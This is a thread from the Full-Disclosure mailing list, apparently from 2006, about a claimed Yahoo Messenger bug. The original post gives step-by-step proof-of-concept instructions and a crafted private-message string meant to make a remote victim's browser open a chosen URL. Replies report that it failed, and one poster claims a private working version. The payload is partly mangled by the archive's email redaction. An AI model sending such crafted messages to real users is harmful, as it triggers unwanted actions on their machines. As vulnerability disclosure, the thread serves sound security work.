Re: [Full-disclosure] Yahoo messenger serious bug
I have a private PoC for this now for a few months, it does work ( although the PoC is slightly different and only requires one msg string to be sent ). cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
didnt' work for me either.On 7/28/06, John Dietz <[EMAIL PROTECTED]> wrote:
I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees:
s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: -
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg
: -
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window?
Cheers
On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]
> wrote:
Hi,I found another vulnerability in yahoo messenger thatif you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("(without quotes) Yahoo messenger open in this case
google.com in the internet explorer of the remote
victim.Yahoo messenger bug proof of concept:1. Open messenger and log it.2. Open a yahoo chat third party like yahelite throughYmsgr protocol and log it with another account.3. Send a Pm to the messenger account with this
string: s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(4. The remote user will open
www.google.com (you canchange)Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a spaces:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(Tested in yahoo messenger 7.0/7.5Regards.__
Preguntá. Respondé. Descubrí.Todo lo que querías saber, y lo que ni imaginabas,está en Yahoo! Respuestas (Beta).¡Probalo ya!
http://www.yahoo.com.ar/respuestas
___Full-Disclosure - We believe in it.Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.
___Full-Disclosure - We believe in it.Charter:
http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
-- -- h0 h0 h0 --www.nopsled.net
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees:
s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: -
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: -
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(.
There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window?
Cheers
On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote:
Hi,I found another vulnerability in yahoo messenger thatif you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("(without quotes) Yahoo messenger open in this casegoogle.com in the internet explorer of the remote
victim.Yahoo messenger bug proof of concept:1. Open messenger and log it.2. Open a yahoo chat third party like yahelite throughYmsgr protocol and log it with another account.3. Send a Pm to the messenger account with this
string: s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(4. The remote user will open www.google.com (you canchange)Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a spaces:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(Tested in yahoo messenger 7.0/7.5Regards.__
Preguntá. Respondé. Descubrí.Todo lo que querías saber, y lo que ni imaginabas,está en Yahoo! Respuestas (Beta).¡Probalo ya!http://www.yahoo.com.ar/respuestas
___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/-- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo messenger serious bug
Hi,
I found another vulnerability in yahoo messenger that
if you receive a Private message with this string
"helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL
PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("
(without quotes) Yahoo messenger open in this case
google.com in the internet explorer of the remote
victim.
Yahoo messenger bug proof of concept:
1. Open messenger and log it.
2. Open a yahoo chat third party like yahelite through
Ymsgr protocol and log it with another account.
3. Send a Pm to the messenger account with this
string: s: helomsg
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg
:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
4. The remote user will open www.google.com (you can
change)
Note: "helomsg :" this space must be created with
alt+0160 and this "s: " with a space
s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL
PROTECTED](@;+?/(?#@@*-)[EMAIL
PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL
PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(
Tested in yahoo messenger 7.0/7.5
Regards.
__
Preguntá. Respondé. Descubrí.
Todo lo que querías saber, y lo que ni imaginabas,
está en Yahoo! Respuestas (Beta).
¡Probalo ya!
http://www.yahoo.com.ar/respuestas
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
